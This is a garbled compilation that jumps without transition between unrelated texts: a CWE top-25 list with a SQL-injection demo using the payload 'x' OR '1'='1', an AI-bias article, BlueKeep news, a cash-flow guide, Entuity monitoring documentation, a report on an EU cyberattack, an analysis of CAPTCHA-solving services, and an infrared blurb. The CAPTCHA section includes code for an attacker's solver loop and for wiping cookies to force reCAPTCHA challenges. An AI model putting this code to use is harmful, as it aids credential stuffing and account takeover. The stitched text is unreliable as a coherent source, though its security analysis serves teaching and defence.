Creating more secure software is a fundamental aspect of system and network security and the top 25 programming errors initiative is an important component of an overall security initiative for our country, it said.
"We applaud this effort and encourage the utility of this tool through other venues such as cyber education," it said.
Top 25 coding errors
- Failure to preserve web page structure ('cross-site scripting')
- Improper sanitisation of special elements used in an SQL command ('SQL injection')
- Buffer copy without checking size of input ('classic buffer overflow')
- Cross-site request forgery (CSRF)
- Improper access control (authorisation)
- Reliance on untrusted inputs in a security decision
- Improper limitation of a pathname to a restricted directory ('path traversal')
- Unrestricted upload of file with dangerous type
- Improper sanitisation of special elements used in an OS command ('OS command injection')
- Missing encryption of sensitive data
- Use of hard-coded credentials
- Buffer access with incorrect length value
- Improper control of filename for include/require statement in PHP program ('PHP file inclusion')
- Improper validation of array index
- Improper check for unusual or exceptional conditions
- Information exposure through an error message
- Integer overflow or wraparound
- Incorrect calculation of buffer size
- Missing authentication for critical function
- Download of code without integrity check
- Incorrect permission assignment for critical resource
- Allocation of resources without limits or throttling
- URL redirection to untrusted site ('open redirect')
- Use of a broken or risky cryptographic algorithm
- Race condition
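To make one entry concrete, here is a hedged sketch of the second item on the list – SQL injection – and its standard fix, using Python's built-in sqlite3 module (the table and data are invented for the example):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'user')")

user_input = "x' OR '1'='1"  # classic injection payload

# VULNERABLE: the input is spliced into the SQL text, so the payload
# rewrites the WHERE clause and returns every row.
unsafe = conn.execute(
    f"SELECT name FROM users WHERE name = '{user_input}'").fetchall()

# SAFE: a parameterized query treats the input as data, never as SQL.
safe = conn.execute(
    "SELECT name FROM users WHERE name = ?", (user_input,)).fetchall()

print(unsafe)  # [('alice',), ('bob',)]  -- injection succeeded
print(safe)    # []                      -- no such user name exists
```

Procurement language that requires code to be free of these errors is, in practice, asking suppliers to show that patterns like the first query never ship.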
Machine Learning, Artificial Intelligence, Blockchain, Genome Editing, etc., are some of the sophisticated technologies surrounding us. As has been the case with any technology, they reduce the need for human intervention in business processes. However, they pose new ethical challenges. Technology is created by humans and often reflects human biases. Machine learning models may reflect the biases of their designers, biases may creep in through the approach of the data scientists who implement the models, and some biases in the data may come from the data engineers who gather it.
In the playbook 'Mitigating Bias in Artificial Intelligence', published by Berkeley Haas, the authors note that "the use of AI in predictions and decision-making can reduce human subjectivity, but it can also embed biases resulting in inaccurate and discriminatory predictions and outputs for certain subsets of the population."
Addressing bias in AI is a smart move for business as the stakes are high for business leaders. Biased AI systems can produce erroneous and discriminatory predictions. It can impact a business’s reputation and future opportunities and earnings.
Marketers and others depend on AI to a considerable extent to help identify the best prospects for a company’s products and services. However, they must take steps to remove any unintentional bias from the AI algorithms, because such bias can prevent their marketing messages from reaching potential buyers.
Technology experts advise the following ways of eliminating or at least minimizing AI biases in data.
Reviewing AI Training Data
Understanding training data is vital for any business aiming to make processes more efficient with data-driven results. A primary source of AI bias is the academic and commercial datasets used to train models. Cross-training employees in various departments on how AI bias arises and its adverse impact can help combat the problem.
Data scientists can ensure that their data gives an accurate and comprehensive picture of the diversity relayed to the end-users. They analyze all the cases and the cause of action to prevent any discrepancies. Businesses must take a close look at the background and experience of different individuals in the tech team.
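As a concrete (and deliberately simplified) illustration of reviewing training data, the sketch below flags demographic groups that are strongly over- or under-represented in a dataset. The function name and the equal-share baseline are assumptions made for this example, not part of any standard:

```python
from collections import Counter

def representation_report(groups, tolerance=0.5):
    """Flag groups whose share of the training data deviates from an
    equal share by more than `tolerance` (as a fraction of the equal
    share). Returns {group: (share, flagged)}."""
    counts = Counter(groups)
    total = sum(counts.values())
    equal_share = 1.0 / len(counts)
    report = {}
    for group, n in counts.items():
        share = n / total
        flagged = abs(share - equal_share) > tolerance * equal_share
        report[group] = (round(share, 3), flagged)
    return report

# An 80/20 split between two groups: the equal share is 0.5, so with
# tolerance 0.5 any group outside [0.25, 0.75] is flagged.
sample = ["A"] * 80 + ["B"] * 20
print(representation_report(sample))  # {'A': (0.8, True), 'B': (0.2, True)}
```

Real reviews would compare against population baselines rather than an equal split, but even a simple check like this can surface obvious gaps before training.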
Check and Recheck AI’s Decisioning
With manual lead scoring systems, it was relatively easy to inspect and identify the discriminatory elements. In modern AI models, such features may be tough to detect. It takes special training to understand them.
One practical way of keeping AI rigorous yet transparent is to regularly review how the AI is applied. A lot of discussion is happening around potential bias in AI. Of course, no one claims that AI is perfect, but AI does eliminate many systemic biases introduced by humans.
A scoring model created by humans may be partial to the biased opinions of its developers. Those creating the model may inadvertently select the attributes and engagement actions that may not be entirely foolproof or fair.
AI decisioning needs to allow for human review. Transparency in the usage of AI is essential, and humans and technology can collaborate and hold each other accountable to mitigate discrimination.
Receive Input Directly From Customers
Organizations must understand the limitations of their data and then analyze customers’ experiences. The best way of doing this is to actually talk to customers from time to time. Collate and record their personal experiences.
Contact customers by phone or email and encourage them to share their experiences in all honesty. Once the issues are understood, they are analyzed, and the necessary corrective steps are taken. Customer support can document complaints from customers and fix problematic algorithms.
Carrying Out Constant Monitoring
Companies can create a framework for ethical decision-making in data and machine learning projects. This is an effective way of constantly monitoring AI systems and detecting bias. Precautions need to be taken in every phase to prevent bias from creeping into the system. Review and monitoring of output are crucial to keeping bias away.
Organizations that follow this method also keep a close watch on various aspects. These include law, human rights, IP and database rights, data sharing, policies, anti-discrimination laws, etc. Monitoring involves looking at data consumption patterns, data sharing processes, awareness, transparency, consent, and data disclosure transparency.
Better control of AI bias is achieved by tracking ongoing implementation, looking at reviews, and repetitions of data ethics concerns. Companies must also consider the process of data disposal and data deletion.
What Can These Steps Do?
When you apply these changes to your AI processes, they can definitely help mitigate and even eliminate AI bias. But some issues may need technological answers. A multidisciplinary approach is also recommended. Opinions from social scientists and humanities professionals can help in devising better strategies.
Still, these changes alone may not help businesses in certain situations. They possibly need more robust and reliable tools to determine whether a system is good enough for release. These tools also help decide whether to give permission for completely automated decision-making in some situations.
We know that an entirely unbiased AI is unlikely in the real world. AI works on data input generated and provided by humans, and human-based prejudices exist everywhere, even in technology. New AI biases in data are discovered regularly, adding to the total number of known biases.
That’s why one can conclude with a degree of firmness that a wholly impartial AI system will never be achieved. However, one can combat this AI bias by testing data and algorithms scrupulously. Companies must apply best practices while gathering and using data and creating AI algorithms.
In May 2019, Microsoft disclosed the BlueKeep vulnerability, tracked as CVE-2019-0708: a serious remote code execution flaw in Windows Remote Desktop Services. The cybersecurity community anticipated that a weaponized exploit would be created and used in massive attacks. The first large attacks employing a BlueKeep exploit were uncovered this weekend.
Shortly after Microsoft reported the vulnerability, many security researchers created proof-of-concept exploits for BlueKeep. One such exploit permitted a researcher to remotely take over a vulnerable computer system in only 22 seconds. The researchers postponed publishing their PoCs because of the criticality of the threat and the volume of devices that could be vulnerable to attack. In the beginning, countless internet-connected devices were at risk, including close to one million Internet of Things (IoT) devices.
The BlueKeep vulnerability can be exploited remotely simply by sending a specially crafted RDP request. User interaction is not necessary to exploit the vulnerability. The flaw is also wormable: self-propagating malware could spread from one vulnerable computer to another on the same network.
Microsoft announced a number of alerts concerning the vulnerability, which has an effect on earlier Windows versions including Windows Server 2003 and 2008, Windows 7 and Windows XP. Organizations and end-users were told to implement the patch without delay to avert the exploitation of the flaw. The NSA, GCHQ, and other government institutions worldwide issued warnings. The cybersecurity community has likewise notified firms and consumers concerning the threat of attack, with lots of people sensing the creation of a weaponized exploit in just weeks.
Although the patch has been available for five months, patching has been slow: close to 724,000 devices have yet to apply it. The total number of vulnerable devices is noticeably larger, because scans do not include devices shielded by firewalls.
Right after the announcement of the vulnerability, security researcher Kevin Beaumont established a worldwide network of Remote Desktop Protocol (RDP) honeypots that were intended to be attacked. For weeks and months, no attempt was made to exploit the vulnerability. Then, on November 2, 2019, Beaumont identified attacks on the honeypots. The first honeypot attack, on October 23, 2019, caused the system to crash and reboot, and further attacks followed on all but the Australian honeypot. Although the attacks were discovered this weekend, the campaign actually started at least two weeks earlier.
Security researcher Marcus Hutchins, aka MalwareTech, examined the crash dumps from the attacks. Hutchins is the researcher who discovered and activated the kill switch that stopped the WannaCry ransomware attacks in May 2017. He located artifacts in memory revealing the use of the BlueKeep vulnerability to attack the honeypots, along with shellcode indicating that the vulnerability was being exploited to deliver a cryptocurrency miner, probably for Monero.
Luckily, the hackers were likely low-level threat actors who have never exploited the maximum potential of the vulnerability. They have yet to develop a self-replicating worm and used the vulnerability only to propagate cryptocurrency mining malware on vulnerable devices through an internet-exposed RDP port. The attacker(s) likely used a BlueKeep exploit that was released on the Metasploit framework in September.
Given that the exploit crashed the honeypots and failed to work against all 11 of them, it is likely that the exploit is not working as planned and has not been adapted to work reliably. Nevertheless, this is a massive campaign, even if many of the individual attacks failed.
The BlueKeep vulnerability had been exploited before by threat actors in smaller sized more focused attacks with success, but this is the first massive-exploitation of BlueKeep.
If threat actors learn how to exploit the full potential of the BlueKeep vulnerability and develop a self-propagating worm, all unpatched devices could be attacked, even those on internal networks. Those attacks would not just slow down computers while mining cryptocurrency; wiper attacks similar to NotPetya could also be conducted. That attack cost the shipping firm Maersk about $300 million.
Stopping these attacks is easy. Apply Microsoft’s patch on all affected computers as soon as possible.
Cash is the beating heart of any successful business, and for most organizations, cash flow will have the most impact on performance and longevity. Businesses fail for many reasons, but most businesses that collapse by the three-year mark can attribute their failure to poor cash flow management.
Underestimating the importance of cash flow modelling can weaken the sustainability of an organization, so it's crucial to understand from the outset how a cash flow model works and why you need one.
Read more about the importance of managing your cash flows in the ever-changing payments industry. Download our guide today.
What is a cash flow model?
Cash flow modelling creates visibility into a company's assets, income, expenditure, debts and investments as an indicator of its future business performance and its most important business goal: solvency.
Cash flow modeling enables businesses to plan for the future, as well as potential market fluctuations, and even an economic recession.
Every business's cash flow modelling strategy is different, so it's impossible to create a one-size-fits-all approach, but a cash flow forecast model should start by taking three crucial factors into consideration:
- Beginning cash balance: The total cash on hand you expect to have at the beginning of the month.
- Cash inflows: The cash coming into your business from operations, investments, or financing (through debt or equity).
- Cash outflows: All of the cash being spent through the business, including utilities, loan payments, rent, payroll, taxes, and all operating expenses.
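Putting the three factors together, a minimal forecast simply carries each month's ending balance forward as the next month's beginning balance. The figures below are illustrative, not taken from the article:

```python
def forecast_balances(beginning_cash, inflows, outflows):
    """Project the month-end cash balance for each period:
    ending = beginning + inflow - outflow, carried forward."""
    balances = []
    cash = beginning_cash
    for inflow, outflow in zip(inflows, outflows):
        cash = cash + inflow - outflow
        balances.append(cash)
    return balances

# A three-month sketch with made-up figures:
months = forecast_balances(
    beginning_cash=10_000,
    inflows=[8_000, 6_500, 9_000],   # sales, investments, financing
    outflows=[7_000, 8_500, 7_500],  # rent, payroll, taxes, operating expenses
)
print(months)  # [11000, 9000, 10500]
```

A negative value anywhere in the projection is an early warning that the business will need to accelerate collections or arrange financing before that month arrives.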
The most effective cash flow forecasts always include current information, as well as a variety of possible future scenarios. To achieve this, businesses need complete access to insights, data and analytics.
Full visibility on cash flow empowers businesses to plan for the future, anticipate potential issues and avoid reliance on loans and credit card debt.
Read our guide to monitoring and improving cash flow visibility here
What is cash flow forecasting?
A cash flow forecast helps a business plan for the future. A good cash flow forecast model estimates a business’s future financial position and helps ensure that it will have the necessary amount of cash to meet future obligations and better manage working capital.
Key financial reports such as the income statement (or profit and loss statement) only look at sales and expense activity, while the balance sheet reports on assets, liabilities and contributions of equity.
A cash flow forecast on the other hand includes all movements of cash in and out of a business within a given time period. This helps ensure there is enough operating cash flow, and that the working capital is managed as effectively as possible.
How can cash flow forecasting benefit a business?
Business owners make difficult financial decisions every day. Cash flow forecasting is an essential part of business planning for a number of key reasons, and can help relieve the burden of cash flow management. The main advantages of a good cash flow forecast model include:
Late payments from customers and clients can affect cash flows enormously. But modeling alternative scenarios can help businesses to understand future plans, possible outcomes, and how various situations will impact their cash inflows.
Monitoring overdue payments
While consistently overdue payments can severely affect a business, having insight into late payers, and the impact they have on the bottom line, can help formulate plans for more effective credit control.
Managing surplus cash
For many businesses, it’s rare to see excess cash in the bank, but utilizing additional cash for reinvestment in new markets, or for the repayment of loans, can be essential to maintain actual cash flow.
Tracking whether spending is on target
Every business has revenue goals and targets that are time-sensitive. But cash forecasts can help a business owner to understand exactly when and if they will reach those goals, and increase the accuracy of future budgeting.
Keeping investors and stakeholders informed
Good governance is vital to the success and longevity of any business. A detailed cash flow model forecast offers additional insight into the potential of a business, encouraging confidence and reassuring investors that their investment will be safe.
Identifying potential problems
With forecasting as part of your cash flow model, you can anticipate surpluses and shortages to help with decision making about whether to increase focus on collections, or to seek a line of credit.
Forecasting helps manage all aspects of a business's financial position, including how much cash is coming in from revenue streams, where it’s being spent on operating expenses, and the number of funds available after fulfilling these obligations.
Cash flow forecasting can help navigate the current climate within an industry and help businesses prepare for cash shortage situations like holidays & vacation periods that could affect a company’s bottom line.
The ability to forecast cash flow enables organizations to stay ahead of cash flow needs by identifying when more capital is needed to cover expenses and payroll commitments.
Financial analysis, planning and budgeting
A robust system for managing income and expenses is crucial for any business. A cash flow forecast can be complicated, because it involves measuring and monitoring many variables - and making predictions about performance.
But businesses need a sturdy financial model to know how much money is cycling through the company at any given time, and what cash is expected, to create a budget. Budgeting gives a detailed view of what income and capital expenditure a business can expect, and what might need to be cut.
Business leaders should spend time with their finance and accounting department as they build their financial model. It's essential to have a full understanding of accounts receivable and accounts payable. Here are some things to review:
- Variable costs (labor and raw materials, for example)
- Fixed costs (rent, utilities, certain salaries and business insurance)
- Other significant expenses (investments in equipment or software).
Enhanced analysis and regular examination of cash positions will increase the accuracy of a business's picture of its financial position.
Many businesses experience some seasonality. There could be months when clients are more active in purchasing a company's products or services. Seasonality can have a material effect on expected future cash flows. A good cash flow forecast will anticipate when cash outflows and cash receipts are higher or lower, allowing better management of the company's working capital needs.
For example, a retailer specializing in swimwear and accessories would obviously experience a higher selling season throughout Spring and Summer. But with the store open all year round, the business will still incur operating expenses such as rent, utilities, and labor.
This means that sales and profits during the summer months must be enough to cover all annual expenses, including working capital to purchase goods (inventory) to sell in the coming selling season. It’s the timing of these transactions that makes budgeting decisions especially complex.
A detailed view of a cash flow statement shows the timing and amounts of revenue and expenses that affect cash flows.
How often should a business do a cash flow forecast?
Cash flow is a changing metric, and it needs to be monitored frequently over a given period. Businesses should build cash flow forecasts for the short (weekly or monthly), medium (quarterly) and long (yearly) term. The needs of the business will dictate which time frame is the most valuable. Financial experts recommend a monthly cash flow forecast at the very least, and possibly more frequent forecasts in times of economic instability.
Monthly or quarterly forecasts are generally more useful for stable, established businesses. Weekly projections will be essential for companies scaling up or going through significant changes, such as a restructuring or a merger/acquisition.
What is Discounted Cash Flow (DCF)?
Discounted cash flow is a method used to estimate the value of an investment based on its expected future cash flows. DCF analysis attempts to determine the current value of an investment, based on projections of how much money it will generate in the future. The present value of expected future cash flow is determined by using a discount rate to calculate the DCF.
This applies to the decisions of investors in companies or securities, for example when acquiring a company or buying a stock, and for business owners and managers looking to make capital budgeting or operating expenditures decisions. If the discounted cash flow is above the current cost of the investment, the opportunity could result in positive returns.
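In code, the DCF calculation is a short sum over the expected cash flows. The sketch below assumes the first cash flow arrives one period from now, which is the usual convention:

```python
def discounted_cash_flow(cash_flows, rate):
    """Present value of a series of future cash flows, where
    cash_flows[0] arrives one period from now:
    PV = sum(CF_t / (1 + r)**t) for t = 1..n."""
    return sum(cf / (1 + rate) ** t
               for t, cf in enumerate(cash_flows, start=1))

# An investment expected to return 100 per year for 3 years,
# discounted at 10% per year:
pv = discounted_cash_flow([100, 100, 100], rate=0.10)
print(round(pv, 2))  # 248.69
```

In this example, if the investment costs less than about 248.69 today, the opportunity could result in positive returns; if it costs more, the expected cash flows do not justify the price at a 10% discount rate.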
Why cash flow analysis is vital
Business leaders look at cash flow numbers as an indication of how well -or how badly - their business is performing. Cash flow analysis reveals any patterns or trends that can help address deficiencies or expand on strengths within a business.
Read our detailed report on why every business should do cash flow analysis here
Image source: Wall Street Mojo
The importance of insights and analytics in cash flow modeling
Organizations who have visibility into their current and projected liquidity positions are undoubtedly in a better position to manage business continuity than those who don't.
With real time dashboards to display live data, analyzing cash flow is as easy as pressing a button to generate reports. Senior management can then use this data to provide them with the tools to make better informed financial and risk assessment decisions.
IR Transact simplifies the complexity of managing modern payments ecosystems, bringing real-time visibility and access to your payments system.
Businesses can gain unlimited access and insights into money flows, customer usage data, and end-to-end transaction performance metrics, offering a thousand points of reference, from a single point of view.
The ability to view an organization's entire payments ecosystem provides management with solutions to problems, which ultimately leads to an increase in profitability.
You can also create service hierarchies by creating sub-services. The state of a sub-service contributes to the state of its parent service. This means you can model complex services with multiple contributing sub-services.
Service as a managed object
A service acts as a managed object, to which you can associate the components that deliver that service. A service definition determines e.g.:
- how the states of components in the service should be interpreted, in order to set the state of the service.
- whether a change in the state of the service would raise an event.
- the SLA goal, i.e. the minimum % of component availability for acceptable delivery of service.
Services have a state to denote their current condition. The state of a service depends on its service logic.
- Up - when at least the number of components required by the service logic for the service to be up are in an up state.
- Degraded - when the service logic is set to 'At Least' and the number of components in an up state is at least the 'Degraded Threshold' but less than the 'At Least' number required for the service to be up.
- Down - this depends on the service logic; generally, when one or more components that the service logic requires to be up (and that contribute to the service's overall state) are down.
- Unknown - when Entuity cannot determine the status of one or more components that contribute to the service's overall state, and therefore the overall service state is unknown.
- None - when the service does not return a state; the service logic includes a 'None' option, which is the equivalent of turning off the service.
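A simplified sketch of how an 'At Least' service logic might derive these states is shown below. The function and parameter names are illustrative, and the exact Entuity semantics may differ (for instance, in how unknown components interact with the thresholds):

```python
def service_state(component_states, at_least, degraded_threshold):
    """Derive a service state from its components' states using an
    'At Least' style rule: the service is up when at_least components
    are up, degraded when at least degraded_threshold (but fewer than
    at_least) are up, and down otherwise. Any unknown component makes
    the overall state unknown in this simplified model."""
    if any(s == "unknown" for s in component_states):
        return "unknown"
    up = sum(1 for s in component_states if s == "up")
    if up >= at_least:
        return "up"
    if up >= degraded_threshold:
        return "degraded"
    return "down"

# Two of three components up, with at_least=3 and degraded_threshold=2:
print(service_state(["up", "up", "down"], at_least=3, degraded_threshold=2))  # degraded
```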
Associating components to a service
The components you can associate to a service include:
- devices with associated components, e.g. ports.
- devices without associated components.
- servers as managed devices.
- IP SLA operations.
- components of devices, e.g. fans, PSUs and temperature sensors.
- other services which allows you to build a service hierarchy.
When populating a service with components, you can add components to the View and the service, or just the service alone. If a component is added to a service alone, it will become available to the user even if they do not have permission to see a View to which the component belongs.
Managing your services
Services can be managed through:
- Services dashboard and services dashlets.
- Services reports:
  - CIO Perspective report includes a Services Summary and access to the Server Availability report.
To create a service within a View, you must have the appropriate permission to access the View, the View edit permission, and the Service Administration permission.
Administrators can create subservices (services that are created within a service). Administrators can also assign service ownership to non-administrators.
Users with the Service Administration tool permission can edit and delete services, including top-level services. When a non-administrator is the owner of a service, they can create subservices within it. Users with the appropriate permission can also:
- add components to a service (and therefore to the View).
- remove components from a service.
In both cases, this could amend the access scope of other user groups associated with the View, and so Administrators should be aware of this when assigning permissions for services.
Multi-server and remote objects in services
Services are defined against a selected View, or against the selected Entuity server (which is effectively against the All Objects View on that server). Services can only be defined against one View or one server, but can include sub-services from different servers. Therefore service hierarchies can be split across multiple servers, although Entuity discourages this because service updates will be more reliable and responsive if all the service's objects are on the same server.
If you access more than one Entuity server, Entuity does not consolidate services across those servers. E.g. if two services across two servers share the same name, they will remain separate services.
Services can contain components that are under management by another Entuity server. In this case, Entuity creates a local record of the remote object details, to identify the component and its state. Users with appropriate permissions can access more details through the remote server, but users without the appropriate permissions cannot.
Entuity has 2 methods of maintaining the state of remote objects:
- Every 10 minutes, the local server that is managing the service checks the remote server for the presence and state of the object. If the local server loses contact with the remote server, then the state of the remote object becomes unknown after 10 minutes.
- The remote server maintains a record of Entuity servers using objects under its management in their services. If one of these objects changes state, the remote server notifies the local server that is managing the service.
If remote object states are only updating every 10 minutes, this indicates that a firewall is preventing incoming messages initiated by the remote server, but is allowing updates initiated by the local server managing the services.
The European Commission (EC), the executive branch of the European Union (EU), is among a number of EU institutions targeted by a cyberattack last month, the organization has confirmed.
As reported by Bleeping Computer, what's known so far is that the attackers did not manage to break into EC systems and did not make off with any sensitive data. However, forensic analysis of the event is still ongoing, and new information may yet emerge.
The EC set up a non-stop service that aims to eliminate any issues in the aftermath of the attack.
"We are working closely with CERT-EU, the Computer Emergency Response Team for all EU institutions, bodies and agencies and the vendor of the affected IT solution," an EC spokesperson told BleepingComputer. "The Commission has set up a 24/7 monitoring service and is actively taking mitigating measures,” it was added.
Information on the event is limited, and the identity of the group behind the attack remains unknown. Neither do we know how the attack took place, what tools and tactics were used, nor what the attackers' motives may have been.
According to Bloomberg, the attack was bigger than those the EC usually experiences, and big enough for senior officials to be alerted. The same source claims EU staff were warned about potential phishing attempts.
The CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) was originally designed to prevent bots, malware, and artificial intelligence (AI) from interacting with a web page. In the 90s, this meant preventing spam bots. These days, organizations use CAPTCHA in an attempt to prevent more sinister automated attacks like credential stuffing.
Almost as soon as CAPTCHA was introduced, however, cybercriminals developed effective methods to bypass it. The good guys responded with “hardened” CAPTCHAs but the result remains the same: the test that attempts to stop automation is circumvented with automation.
There are multiple ways CAPTCHA can be defeated. A common method is to use a CAPTCHA-solving service, which utilizes low-cost human labor in developing countries to solve CAPTCHA images. Cybercriminals subscribe to such a service and stream the solutions into their automation tools via APIs, populating the answers on the target website. These shady enterprises are so ubiquitous that many can be found with a quick Google search.
This article will use 2Captcha to demonstrate how attackers integrate the solution to orchestrate credential stuffing attacks.
Upon accessing the site 2Captcha.com, the viewer is greeted with the image below, asking whether the visitor wants to 1) work for 2Captcha or 2) purchase 2Captcha as a service.
To work for 2Captcha, simply register for an account, providing an email address and PayPal account for payment deposits. During a test, an account was validated within minutes.
New workers must take a one-time training course that teaches them how to quickly solve CAPTCHAs. It also provides tips such as when case does and doesn’t matter. After completing the training with sufficient accuracy, the worker can start earning money.
After selecting “Start Work,” the worker is taken to the workspace screen, which is depicted above. The worker is then provided a CAPTCHA and prompted to submit a solution. Once solved correctly, money is deposited into an electronic “purse,” and the worker can request payout whenever they choose. There is seemingly no end to the number of CAPTCHAs that appear in the workspace, indicating a steady demand for the service.
2Captcha workers are incentivized to submit correct solutions much like an Uber driver is incentivized to provide excellent service—customer ratings. 2Captcha customers rate the accuracy of the CAPTCHA solutions they received. If a 2Captcha worker’s rating falls below a certain threshold, she will be kicked off the platform. Conversely, workers with the highest ratings will be rewarded during times of low demand by receiving priority in CAPTCHA distribution.
To use 2Captcha as a service, a customer (i.e., an attacker) integrates the 2Captcha API into her attack to create a digital supply chain, automatically feeding CAPTCHA puzzles from the target site and receiving solutions to input into the target site.
How would an attacker use 2Captcha in a credential stuffing attack? The diagram below shows how the different entities interact in a CAPTCHA bypass process:
Combined with web testing frameworks like Selenium or PhantomJS, an attacker can appear to interact with the target website in a human-like fashion, effectively bypassing many existing security measures to launch a credential stuffing attack.
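The submit-and-poll supply chain described above can be sketched in a few lines. The parameter names and the literal `CAPCHA_NOT_READY` status below are modeled on 2Captcha's public API but are not verified here; the HTTP calls are injected as plain callables so the flow can be demonstrated offline:

```python
import time

def solve_captcha(submit, poll, api_key, image_b64, max_polls=24, interval=5):
    """Submit a CAPTCHA image to a solving service and poll until a
    human worker returns the solution. `submit` and `poll` are
    injected HTTP callables, so no real network traffic is needed."""
    task_id = submit({"key": api_key, "method": "base64", "body": image_b64})
    for _ in range(max_polls):
        answer = poll({"key": api_key, "action": "get", "id": task_id})
        if answer != "CAPCHA_NOT_READY":  # service's pending-status string
            return answer
        time.sleep(interval)
    raise TimeoutError("no solution after %d polls" % max_polls)

# Offline demo with stubbed transport: the first poll is still pending,
# the second returns the worker's answer.
replies = iter(["CAPCHA_NOT_READY", "OK|xn7dk2"])
answer = solve_captcha(
    submit=lambda params: "12345",
    poll=lambda params: next(replies),
    api_key="demo", image_b64="...", interval=0,
)
print(answer)  # OK|xn7dk2
```

In a real attack, the returned string would be typed into the target site's CAPTCHA field by the browser-automation layer before submitting the stolen credentials.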
With such an elegant solution in place, what does the financial ecosystem look like, and how do the parties each make money?
Working as a CAPTCHA solver is far from lucrative. Based on the metrics provided on 2Captcha’s website, it’s possible to calculate the following payout:
Assuming it takes 6 seconds per CAPTCHA, a worker can submit 10 CAPTCHAs per minute or 600 CAPTCHAs per hour. In an 8 hour day that’s 4800 CAPTCHAs. Based on what was earned during our trial as an employee for 2Captcha (roughly $0.0004 per solution), this equates to $1.92 per day.
This is a waste of time for individuals in developed countries, but for those who live in locales where a few dollars per day can go relatively far, CAPTCHA solving services are an easy way to make money.
The attacker pays the third party, 2Captcha, for CAPTCHA solutions in bundles of 1000. Attackers bid on the solutions, paying anywhere between $1 and $5 per bundle.
Many attackers use CAPTCHA-solving services as a component of a larger credential stuffing attack, which justifies the expense. For example, suppose an attacker is launching an attack to test one million credentials from Pastebin on a target site. In this scenario, the attacker needs to bypass one CAPTCHA with each set of credentials, which would cost roughly $1000. Assuming a 1.5% successful credential reuse rate, the attacker can take over 15,000 accounts, which can all be monetized.
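The attacker's side of the ledger works out the same way (one million credentials, $1 per 1,000 solutions, and the 1.5% reuse rate assumed in the example above):

```python
def stuffing_economics(credentials=1_000_000, price_per_1000=1.0,
                       reuse_rate=0.015):
    """Return (CAPTCHA spend in dollars, accounts expected to be taken over)."""
    captcha_cost = credentials / 1000 * price_per_1000  # one solve per attempt
    accounts = round(credentials * reuse_rate)          # successful takeovers
    return captcha_cost, accounts

cost, accounts = stuffing_economics()
assert cost == 1000.0 and accounts == 15_000
```

At those numbers, $1,000 of CAPTCHA solving buys access to roughly 15,000 monetizable accounts, which is why the expense is easily justified.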
2Captcha receives payment from the Attacker on a per 1000 CAPTCHA basis. As mentioned above, customers (i.e. attackers) pay between $1 and $5 per 1000 CAPTCHAs. Services like 2Captcha then take a cut of the bid price and dole out the rest to their human workforce. Since CAPTCHA solving services are used as a solution at scale, the profits add up nicely. Even if 2Captcha only receives $1 per 1000 CAPTCHAs solved, they net a minimum of 60 cents per bundle. The owners of these sites are often in developing countries themselves, so the seemingly low revenue is substantial.
In March of this year, Google released an upgraded version of its reCAPTCHA called “Invisible reCAPTCHA.” Unlike “no CAPTCHA reCAPTCHA,” which required all users to click the infamous “I’m not a Robot” button, Invisible reCAPTCHA allows known human users to pass through while only serving a reCAPTCHA image challenge to suspicious users.
You might think that this would stump attackers because they would not be able to see when they were being tested. Yet, just one day after Google introduced Invisible reCAPTCHA, 2Captcha wrote a blog post on how to beat it.
The way Google knows a user is a human is if the user has previously visited the requested page, which Google determines by checking the browser’s cookies. If the same user started using a new device or recently cleared their cache, Google does not have that information and is forced to issue a reCAPTCHA challenge.
For an attacker to automate a credential stuffing attack using 2Captcha, he needs to guarantee a CAPTCHA challenge. Thus, one way to bypass Invisible reCAPTCHA is to add a line of code to the attack script that clears the browser with each request, guaranteeing a solvable reCAPTCHA challenge.
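In browser-automation terms, that "clear the browser with each request" step really is close to a one-liner. The sketch below uses a stand-in driver object so the flow can be shown without a real browser; with Selenium, the equivalent WebDriver calls are `delete_all_cookies()` and `get()`:

```python
def force_fresh_challenge(driver, url):
    """Wipe session state so Invisible reCAPTCHA must serve a challenge.

    With no cookies, Google has no browsing history vouching for this
    'user' and falls back to issuing a solvable CAPTCHA challenge.
    """
    driver.delete_all_cookies()  # appear to be a brand-new visitor
    driver.get(url)              # reload the target page

class RecordingDriver:
    """Minimal stand-in for a WebDriver, used here only for illustration."""
    def __init__(self):
        self.calls = []
    def delete_all_cookies(self):
        self.calls.append("delete_all_cookies")
    def get(self, url):
        self.calls.append(("get", url))
```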
The slightly tricky thing about Invisible reCAPTCHA is that the CAPTCHA challenge is hidden, but there is a workaround. The CAPTCHA can be "found" by using the "inspect element" browser tool, so the attacker can send a POST to 2Captcha that includes a parameter detailing where the hidden CAPTCHA is located. Once the attacker receives the CAPTCHA solution from 2Captcha, Invisible reCAPTCHA can be defeated through automation.
The fact that Invisible reCAPTCHA can be bypassed isn’t because there was a fatal flaw in the design of the newer CAPTCHA. It’s that any reverse Turing test is inherently beatable when the pass conditions are known.
As long as there are CAPTCHAs, there will be services like 2Captcha because the economics play so well into the criminal’s hands. Taking advantage of low cost human labor minimizes the cost of doing business and allows cybercriminals to reap profits that can tick upwards of millions of dollars at scale. And there will always be regions of the world with cheap labor costs, so the constant demand ensures constant supply on 2Captcha’s side.
The world doesn’t need to develop a better CAPTCHA, since this entire approach has fundamental limitations. Instead, we should acknowledge those limitations and implement defenses where the pass conditions are unknown or are at least difficult for attackers to ascertain.
Holmes, Tamara E. “Prepaid Card and Gift Card Statistics.” CreditCards.com. Creditcards.com, 01 Dec. 2015. Web.
Hunt, Troy. “Breaking CAPTCHA with Automated Humans.” Blog post. Troy Hunt. Troy Hunt, 22 Jan. 2012. Web.
Motoyama, Marti, Kirill Levchenko, Chris Kanich, and Stefan Savage. Re: CAPTCHAs–Understanding CAPTCHA-solving Services in an Economic Context. Proc. of 19th USENIX Security Symposium, Washington DC. Print.
You may be familiar with infrared technology, but you may be unsure of how it works or the limitless possibilities it possesses. Infrared is used in many everyday applications, including simple things like using a remote control, communications, and even reading the weather. However, you may be unaware that infrared technology can do things like detect whether you are drunk, treat ailments like arthritis and pain, or heal oral ulcers, which are a side effect of chemotherapy. Indeed, infrared technology can be used for more than just security cameras and night vision. The possibilities are seemingly limitless.
Infrared technology works by using electromagnetic radiation to translate temperatures into different colors. The term infrared combines the English word red and the Latin word infra, which translates to "below." This is because the frequency of infrared light is below that of red light. Red is the longest wavelength visible to the human eye, rendering infrared waves invisible. However, advanced technologies can see these wavelengths for us so we may make them useful.
